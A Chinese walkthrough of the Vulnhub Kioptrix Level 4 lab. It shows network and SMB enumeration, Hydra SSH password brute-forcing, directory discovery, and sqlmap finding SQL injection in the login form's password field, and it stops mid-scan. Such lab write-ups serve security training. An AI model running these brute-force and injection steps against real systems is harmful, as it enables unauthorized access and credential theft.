Vulnhub之Kioptrix Level 4靶机详细测试过程
Kioptrix Level 4
作者:jason_huawen
靶机基本信息
名称:Kioptrix: Level 1.3 (#4)
地址:
识别目标主机IP地址
─(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# netdiscover -i eth1 -r 192.168.187.0/24 130 ⨯Currently scanning: 192.168.187.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.187.133 00:0c:29:52:b3:16 1 60 VMware, Inc.
192.168.187.254 00:50:56:fe:ae:b9 1 60 VMware, Inc.
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.187.133
NMAP扫描
──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# nmap -sS -sV -sC -p- 192.168.187.133 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-05 01:31 EST
Nmap scan report for bogon (192.168.187.133)
Host is up (0.00067s latency).
Not shown: 39528 closed tcp ports (reset), 26003 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:52:B3:16 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 10h30m04s, deviation: 3h32m07s, median: 8h00m04s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2022-12-05T09:32:29-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.27 seconds
获得Shell
先来看SMB服务:
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# smbclient -L 192.168.187.133
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# enum4linux 192.168.187.133
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Dec 5 01:33:43 2022
==========================
| Target Information |
==========================
Target ........... 192.168.187.133
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 192.168.187.133 |
=======================================================
[+] Got domain/workgroup name: WORKGROUP
===============================================
| Nbtstat Information for 192.168.187.133 |
===============================================
Looking up status of 192.168.187.133
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
========================================
| Session Check on 192.168.187.133 |
========================================
[+] Server 192.168.187.133 allows sessions using username '', password ''
==============================================
| Getting domain SID for 192.168.187.133 |
==============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=========================================
| OS information on 192.168.187.133 |
=========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.187.133 from smbclient:
[+] Got OS info for 192.168.187.133 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
================================
| Users on 192.168.187.133 |
================================
============================================
| Share Enumeration on 192.168.187.133 |
============================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KIOPTRIX4
[+] Attempting to map shares on 192.168.187.133
//192.168.187.133/print$ Mapping: DENIED, Listing: N/A
//192.168.187.133/IPC$ [E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
=======================================================
| Password Policy Information for 192.168.187.133 |
=======================================================
[+] Attaching to 192.168.187.133 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] KIOPTRIX4
[+] Builtin
[+] Password Info for Domain: KIOPTRIX4
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
=================================
| Groups on 192.168.187.133 |
=================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==========================================================================
| Users on 192.168.187.133 via RID cycling (RIDS: 500-550,1000-1050) |
==========================================================================
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
================================================
| Getting printer info for 192.168.187.133 |
================================================
No printers returned.
enum4linux complete on Mon Dec 5 01:34:00 2022
通过enum4linux工具发现了以下用户名:
loneferret
john
robert
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# hydra -l loneferret -P /usr/share/wordlists/rockyou.txt ssh://192.168.187.133
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-05 01:46:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.187.133:22/
[STATUS] 2520.00 tries/min, 2520 tries in 00:01h, 14341912 to do in 94:52h, 16 active
[STATUS] 916.67 tries/min, 2750 tries in 00:03h, 14341682 to do in 260:46h, 16 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# hydra -l robert -P /usr/share/wordlists/rockyou.txt ssh://192.168.187.133
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-05 01:50:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.187.133:22/
[STATUS] 1096.00 tries/min, 1096 tries in 00:01h, 14343336 to do in 218:07h, 16 active
[STATUS] 436.00 tries/min, 1308 tries in 00:03h, 14343124 to do in 548:18h, 16 active
[STATUS] 297.71 tries/min, 2084 tries in 00:07h, 14342348 to do in 802:55h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# hydra -l john -P /usr/share/wordlists/rockyou.txt ssh://192.168.187.133
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-05 01:59:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.187.133:22/
[STATUS] 4316.00 tries/min, 4316 tries in 00:01h, 14340116 to do in 55:23h, 16 active
[STATUS] 1510.67 tries/min, 4532 tries in 00:03h, 14339900 to do in 158:13h, 16 active
[STATUS] 709.71 tries/min, 4968 tries in 00:07h, 14339464 to do in 336:45h, 16 active
没有破解出任何用户名的密码。
用浏览器访问80端口,返回登录页面。
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# gobuster dir -u http://192.168.187.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.187.133
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/05 01:39:26 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 1255]
/images (Status: 301) [Size: 358] [--> http://192.168.187.133/images/]
/member (Status: 302) [Size: 220] [--> index.php]
/logout (Status: 302) [Size: 0] [--> index.php]
/john (Status: 301) [Size: 356] [--> http://192.168.187.133/john/]
/robert (Status: 301) [Size: 358] [--> http://192.168.187.133/robert/]
/server-status (Status: 403) [Size: 335]
识别出/john、/robert目录,访问该目录,发现可以直接登录,但是登录后没有任何功能
用Burpsuite拦截请求,将其存为req.txt
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# sqlmap -r req.txt
___
__H__
___ ___[(]_____ ___ ___ {1.6.3#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:17:25 /2022-12-05/
[02:17:25] [INFO] parsing HTTP request from 'req.txt'
[02:17:27] [INFO] testing connection to the target URL
[02:17:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:17:28] [INFO] testing if the target URL content is stable
[02:17:28] [INFO] target URL content is stable
[02:17:28] [INFO] testing if POST parameter 'myusername' is dynamic
[02:17:28] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[02:17:28] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[02:17:28] [INFO] testing for SQL injection on POST parameter 'myusername'
[02:17:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:17:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:17:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:17:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:17:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:17:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVI
但是没有探测出SQL注入漏洞,增加risk-level
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# sqlmap -r req.txt --level=3
___
__H__
___ ___[)]_____ ___ ___ {1.6.3#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:21:26 /2022-12-05/
[02:21:26] [INFO] parsing HTTP request from 'req.txt'
[02:21:26] [INFO] testing connection to the target URL
[02:21:26] [INFO] testing if the target URL content is stable
[02:21:26] [INFO] target URL content is stable
[02:21:26] [INFO] testing if POST parameter 'myusername' is dynamic
[02:21:26] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[02:21:26] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[02:21:26] [INFO] testing for SQL injection on POST parameter 'myusername'
[02:21:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:21:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:21:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:21:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:21:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:21:27] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:21:27] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[02:21:27] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[02:21:27] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:21:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:21:27] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[02:21:27] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[02:21:27] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[02:21:27] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[02:21:27] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[02:21:27] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[02:21:27] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[02:21:27] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[02:21:27] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[02:21:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:21:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[02:21:27] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[02:21:27] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[02:21:27] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[02:21:27] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[02:21:27] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[02:21:27] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[02:21:27] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[02:21:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:21:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:21:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:21:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:21:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:21:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:21:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[02:21:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[02:21:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:21:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[02:21:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[02:21:29] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[02:21:29] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[02:21:29] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[02:21:29] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[02:21:29] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:21:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:21:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:21:29] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[02:21:29] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[02:21:29] [INFO] testing 'Oracle error-based - Parameter replace'
[02:21:29] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[02:21:29] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[02:21:29] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[02:21:29] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[02:21:29] [INFO] testing 'Generic inline queries'
[02:21:29] [INFO] testing 'MySQL inline queries'
[02:21:29] [INFO] testing 'PostgreSQL inline queries'
[02:21:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:21:29] [INFO] testing 'Oracle inline queries'
[02:21:29] [INFO] testing 'SQLite inline queries'
[02:21:29] [INFO] testing 'Firebird inline queries'
[02:21:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:21:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:21:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:21:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:21:29] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[02:21:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:21:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[02:21:30] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:21:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:21:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:21:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[02:21:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:21:30] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:21:30] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:21:30] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:21:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:21:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:21:30] [INFO] testing 'Oracle AND time-based blind'
[02:21:30] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:21:30] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:21:31] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[02:21:31] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[02:21:31] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[02:21:31] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[02:21:31] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[02:21:31] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[02:21:31] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n
[02:21:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:21:41] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:21:42] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[02:21:43] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[02:21:44] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[02:21:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:21:46] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:21:47] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[02:21:47] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[02:21:48] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[02:21:49] [WARNING] POST parameter 'myusername' does not seem to be injectable
[02:21:49] [INFO] testing if POST parameter 'mypassword' is dynamic
[02:21:49] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[02:21:49] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[02:21:49] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] y
[02:22:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:22:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:22:05] [INFO] POST parameter 'mypassword' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="28")
[02:22:05] [INFO] testing 'Generic inline queries'
[02:22:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:22:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
got a 302 redirect to 'http://192.168.187.133:80/login_success.php?username=admin'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[02:22:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:22:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:22:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[02:22:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[02:22:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:22:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:22:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:22:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:22:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:22:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:22:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:22:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:22:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:22:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:22:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[02:22:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:22:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:22:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:22:14] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[02:22:14] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[02:22:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:22:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[02:22:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:22:14] [INFO] testing 'MySQL inline queries'
[02:22:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:22:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:22:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:22:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[02:22:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:22:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[02:22:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:22:19] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[02:22:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[02:22:24] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[02:22:44] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 OR time-based blind (SLEEP)' injectable
[02:22:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:22:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:22:44] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:22:45] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[02:22:57] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[02:22:58] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[02:23:03] [INFO] testing 'Generic UNION query (92) - 21 to 40 columns'
[02:23:03] [INFO] testing 'Generic UNION query (92) - 41 to 60 columns'
[02:23:03] [INFO] testing 'MySQL UNION query (92) - 1 to 20 columns'
[02:23:04] [INFO] testing 'MySQL UNION query (92) - 21 to 40 columns'
